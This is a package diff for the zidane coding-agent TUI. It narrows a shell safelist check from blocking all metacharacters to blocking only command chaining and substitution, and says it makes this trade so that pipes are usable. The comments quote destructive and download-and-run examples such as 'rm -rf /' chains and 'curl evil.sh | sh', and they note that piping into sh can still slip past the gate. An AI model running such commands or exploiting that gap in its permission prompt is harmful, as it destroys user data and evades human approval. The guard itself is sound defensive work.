zidane 5.0.5 → 5.0.6

package/dist/{turn-operations-DZ3TrljX.js → turn-operations-BfEh-GER.js}

@@ -2899,43 +2899,74 @@ function primaryArgValue(input) {
 	}
 	return "";
 }
-/** Extract the first whitespace-delimited token of the primary arg. */
-function primaryArgToken(input) {
-	return primaryArgValue(input).split(/\s+/)[0] ?? "";
-}
 /**
-* Shell metacharacters that turn a single command into a compound: pipes,
-* sequencing, redirects, substitutions, line breaks, subshells. A `shell:git:*`
-* entry is meant to greenlight "any git invocation" — without this guard,
-* `git status && rm -rf /` would tokenize to `git` and pass the safelist
-* unchallenged. Reject any command that's not a single program call.
-*
-* The regex is intentionally generous: false positives (e.g. `echo "hi & bye"`)
-* just prompt the user again, which is the safe failure mode.
+* Extract the first whitespace-delimited token of the primary arg.
+* Leading whitespace is trimmed first so `"  git status"` tokenizes to
+* `"git"`, not `""` (an empty first element from `.split(/\s+/)`).
 */
-const SHELL_COMPOUND_RE = /[;&|<>`$\n\r()]/;
-function isCompoundShellCommand(command) {
-	return SHELL_COMPOUND_RE.test(command);
+function primaryArgToken(input) {
+	return primaryArgValue(input).trim().split(/\s+/)[0] ?? "";
+}
+/**
+* Shell features that introduce a SECOND, UNRELATED command into the
+* pipeline — and would silently bypass a `shell:<head>:*` safelist that
+* the user only meant to cover the head program. We block these
+* specifically:
+*
+*   - `;`         — sequence operator (`git status; rm -rf /`)
+*   - `&&` / `||` — and-/or-chains (`git status && curl evil.sh | sh`)
+*   - `\n` / `\r` — multi-line scripts, equivalent to `;`
+*   - `` ` ``     — backtick command substitution (`echo \`rm -rf /\``)
+*   - `$(…)`      — modern command substitution (`echo $(rm -rf /)`)
+*
+* We deliberately do NOT block:
+*
+*   - `|`         — pipes; required for the bread-and-butter CLI pattern
+*                   `sentry issue list … | jq -r '.[]'`.
+*   - `>` / `>>` / `<` / `2>&1` — I/O redirection; `cmd > out.txt` and
+*                   `cmd 2>&1 | jq` are normal CLI usage.
+*   - `&` (alone) — backgrounding; runs the same command in the background
+*                   rather than chaining a new one.
+*   - `(…)`       — subshells; rare in practice, and the chaining
+*                   detectors above already catch the dangerous content
+*                   that would typically live inside them.
+*
+* Trade-off: a model that controls the output of the safelisted head
+* command could in principle pipe garbage into a destructive tool
+* (`sentry list | sh`). The original implementation blocked all
+* metacharacters to avoid that risk, but it made `shell:<head>:*`
+* unusable for real CLI workflows — users hit the prompt on every
+* `cmd | jq` and learned to ignore the modal. Allowing pipes/redirects
+* trusts the user's explicit "I want everything starting with <head>"
+* decision; the chaining rejections above keep the obvious escape
+* hatches closed.
+*
+* The regex is intentionally generous: false positives (e.g. a literal
+* `&&` inside a quoted argument) just prompt the user again, which is
+* the safe failure mode.
+*/
+const SHELL_CHAINING_RE = /&&|\|\||\$\(|[;`\n\r]/;
+function hasShellChaining(command) {
+	return SHELL_CHAINING_RE.test(command);
 }
 /**
 * Test whether a `{ tool, input }` pair is covered by one safelist entry.
 *
 * Supported entry shapes:
-*   - `"<tool>"` — broad match on tool name. For `shell` this still requires
-*     a single-program command (compound forms always prompt).
-*   - `"<tool>:<token>:*"` — match when the primary arg's first token equals
-*     `<token>`. For `shell`, also requires the command to be free of
-*     metacharacters (`;`, `&&`, `||`, `|`, `$(`, backticks, `>`, `<`,
-*     newlines, subshells) — otherwise a `shell:git:*` entry would silently
-*     greenlight `git status && rm -rf /`.
-*
-* Entries that don't fit either shape are ignored (forward-compat for future
-* pattern syntax — readers shouldn't choke on entries written by a newer
-* version of the TUI).
+*   - `"<tool>"` — broad match on tool name. For `shell`, the command
+*     must not chain through another program (see {@link SHELL_CHAINING_RE}).
+*   - `"<tool>:<token>:*"` — match when the primary arg's first token
+*     equals `<token>`. For `shell`, same chaining gate as above. Pipes
+*     and redirects are allowed so `shell:sentry:*` covers the typical
+*     `sentry … | jq …` workflow.
+*
+* Entries that don't fit either shape are ignored (forward-compat for
+* future pattern syntax — readers shouldn't choke on entries written
+* by a newer version of the TUI).
 */
 function matchesSafelistEntry(entry, tool, input) {
 	if (tool === "shell") {
-		if (isCompoundShellCommand(typeof input.command === "string" ? input.command : "")) return false;
+		if (hasShellChaining(typeof input.command === "string" ? input.command : "")) return false;
 	}
 	if (entry === tool) return true;
 	const sep = entry.indexOf(":");
@@ -3676,4 +3707,4 @@ function countNeighbors(turnIds, turnId) {
 //#endregion
 export { SETTINGS_TOGGLES as $, modelsForDescriptor as $t, readProjects as A, FILES_TRIGGER as At, defaultMcpsConfigPaths as B, credentialsPath as Bt, useSafeModeQueue as C, titleFromTurns as Ct, isOnSafelist as D, SKILLS_TRIGGER as Dt, getSafelist as E, findGitRoot$1 as Et, supportsOAuth as F, findActiveTrigger as Ft, ageString as G, writeCredentials as Gt, parseMcpsFile as H, readProviderCredential as Ht, buildModelCatalog as I, mergeReferences as It, shortId as J, cerebrasDescriptor as Jt, compactPath as K, BUILTIN_PROVIDERS as Kt, filterModelCatalog as L, useCompletion as Lt, writeProjects as M, uniqueFilesFromReferences as Mt, splitPromptSegments as N, applyInsert as Nt, matchesSafelistEntry as O, createSkillsCompletionProvider as Ot, runOAuthLogin as P, collectReferences as Pt, SETTINGS_CHOICES as Q, modelSupportsReasoning as Qt, indexOfEntry as R, detectAuth as Rt, useSafeModeActions as S, stripSpawnTokensLine as St, addToSafelist as T, toolResultText as Tt, cleanTitle as U, removeProviderCredential as Ut, discoverProjectMcps as V, readCredentials as Vt, generateSessionTitle as W, setProviderCredential as Wt, useEnabledToggleSet as X, getContextWindow as Xt, listProjectFiles as Y, credKeyOf as Yt, DEFAULT_SETTINGS as Z, getModelInfo as Zt, discoverProjectSkills as _, lastContextSizeFromTurns as _t, ThemeProvider as a, DEFAULT_AGENT_ID as an, resolveTheme as at, writeSessionExport as b, saveState as bt, useSurfaces as c, singleAgentRegistry as cn, CATPPUCCIN_LATTE as ct, finalizeStreamingMarkdown as d, ConfigProvider as dt, openaiDescriptor as en, SettingsProvider as et, finalizeStreamingMarkdownForOwner as f, useConfig as ft, defaultSkillScanPaths as g, eventsFromTurns as gt, buildSkillsConfig as h, deriveSessionTitle as ht, turnAsText as i, BUILTIN_AGENTS as in, resolveChipColor as it, suggestSafelistEntry as j, createFilesCompletionProvider as jt, projectsFilePath as k, uniqueSkillNamesFromReferences as kt, useSyntaxStyles as l, CATPPUCCIN_MACCHIATO as lt, useStreamBuffer as m, createStateStore as mt, deleteTurnSafely as n, piIdOf as nn, BUILTIN_THEMES as nt, useColors as o, PLAN_AGENT as on, VAPORWAVE_THEME as ot, turnContextSize as p, resolveConfig as pt, fmtTokens as q, anthropicDescriptor as qt, truncateTurnsAt as r, BUILD_AGENT as rn, DEFAULT_THEME as rt, useSelectStyle as s, resolveAgentId as sn, CATPPUCCIN_FRAPPE as st, countNeighbors as t, openrouterDescriptor as tn, useSettings as tt, useTheme as u, CATPPUCCIN_MOCHA as ut, renderSession as v, listSessionMeta as vt, IMPLICITLY_SAFE_TOOLS as w, toolCallPreview as wt, SafeModeProvider as x, selectableTurnIds as xt, resolveSessionExportTarget as y, loadState as yt, buildMcpServers as z, applyApiKeyEnv as zt };
 
-//# sourceMappingURL=turn-operations-DZ3TrljX.js.map
+//# sourceMappingURL=turn-operations-BfEh-GER.js.map